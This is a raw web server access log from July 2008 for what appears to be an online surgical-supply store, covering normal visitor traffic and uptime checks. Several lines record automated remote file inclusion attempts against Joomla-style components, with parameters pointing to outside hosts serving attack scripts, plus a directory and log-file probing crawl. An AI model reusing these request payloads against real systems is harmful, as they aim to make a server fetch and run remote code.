211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:34 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:39 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC32F78C02600FE8306E+M37+ENG HTTP/1.1" 200 75940 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:51 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC32F78C02600FE8306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:51 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC32F78C02600FE8306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:51 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC32F78C02600FE8306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:54:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC4207E40160019C306E+M37+ENG HTTP/1.1" 200 46769 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
209.59.12.99 - - [01/Jul/2008:02:54:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.106.136.70 - - [01/Jul/2008:02:54:06 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC4207E40160019C306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:54:06 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC4207E40160019C306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:54:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC42072A0B600228306E+M37+ENG HTTP/1.1" 200 42584 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC4207E40160019C306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:56:11 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC42072A0B600228306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
209.59.12.99 - - [01/Jul/2008:02:59:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.20.14.209 - - [01/Jul/2008:03:03:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:03:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:03:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:03:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
209.59.12.99 - - [01/Jul/2008:03:04:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.20.14.209 - - [01/Jul/2008:03:04:36 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/home_May08.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:37 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:38 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:38 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:38 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:39 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
78.20.14.209 - - [01/Jul/2008:03:04:40 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.3)"
80.88.85.83 - - [01/Jul/2008:03:14:37 -0400] "GET /logs/index2.php?p=http://www.ogclan.de/ccc2/xuxuon.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
80.88.85.83 - - [01/Jul/2008:03:14:37 -0400] "GET /index2.php?p=http://www.ogclan.de/ccc2/xuxuon.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
209.59.12.99 - - [01/Jul/2008:03:14:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:03:19:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:03:24:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:03:29:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.35.101 - - [01/Jul/2008:03:29:48 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
87.230.35.101 - - [01/Jul/2008:03:29:48 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
72.29.81.233 - - [01/Jul/2008:03:32:12 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
72.29.81.233 - - [01/Jul/2008:03:32:12 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
72.29.81.233 - - [01/Jul/2008:03:32:12 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
72.29.81.233 - - [01/Jul/2008:03:32:12 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
209.59.12.99 - - [01/Jul/2008:03:34:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.88.85.83 - - [01/Jul/2008:03:36:55 -0400] "GET /logs/index.php?mosConfig_absolute_path=http://www.ogclan.de/ccc2/xuxuon.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
80.88.85.83 - - [01/Jul/2008:03:36:55 -0400] "GET /index.php?mosConfig_absolute_path=http://www.ogclan.de/ccc2/xuxuon.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
209.59.12.99 - - [01/Jul/2008:03:39:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.29.4.54 - - [01/Jul/2008:03:41:14 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [01/Jul/2008:03:44:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.106.19.213 - - [01/Jul/2008:03:49:26 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
59.106.19.213 - - [01/Jul/2008:03:49:26 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
59.106.19.213 - - [01/Jul/2008:03:49:26 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
59.106.19.213 - - [01/Jul/2008:03:49:27 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [01/Jul/2008:03:49:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.89.210.131 - - [01/Jul/2008:03:53:19 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.812"
208.89.210.131 - - [01/Jul/2008:03:53:19 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.59.12.99 - - [01/Jul/2008:03:54:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:04:09:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.218.101.176 - - [01/Jul/2008:04:10:14 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
87.218.101.176 - - [01/Jul/2008:04:10:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:15 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:17 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:18 -0400] "GET /Includes HTTP/1.1" 301 247 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:25 -0400] "GET /images HTTP/1.1" 301 245 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:30 -0400] "GET /logs HTTP/1.1" 301 243 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:42 -0400] "GET /scripts HTTP/1.1" 301 246 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:42 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:43 -0400] "GET /logs/access_log.Q106121400 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:43 -0400] "GET /logs/access_log.Q106121500 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:44 -0400] "GET /logs/access_log.Q106121600 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:44 -0400] "GET /logs/access_log.Q106121700 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:45 -0400] "GET /logs/access_log.Q106121800 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:45 -0400] "GET /logs/access_log.Q106121900 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:46 -0400] "GET /logs/access_log.Q106122000 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:46 -0400] "GET /logs/access_log.Q106122100 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:46 -0400] "GET /logs/access_log.Q106122200 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:47 -0400] "GET /logs/access_log.Q106122300 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:49 -0400] "GET /logs/access_log.Q106122400 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:50 -0400] "GET /logs/access_log.Q106122500 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:50 -0400] "GET /logs/access_log.Q106122600 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:51 -0400] "GET /logs/access_log.Q106122700 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:51 -0400] "GET /logs/access_log.Q106122800 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:52 -0400] "GET /logs/access_log.Q106122900 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
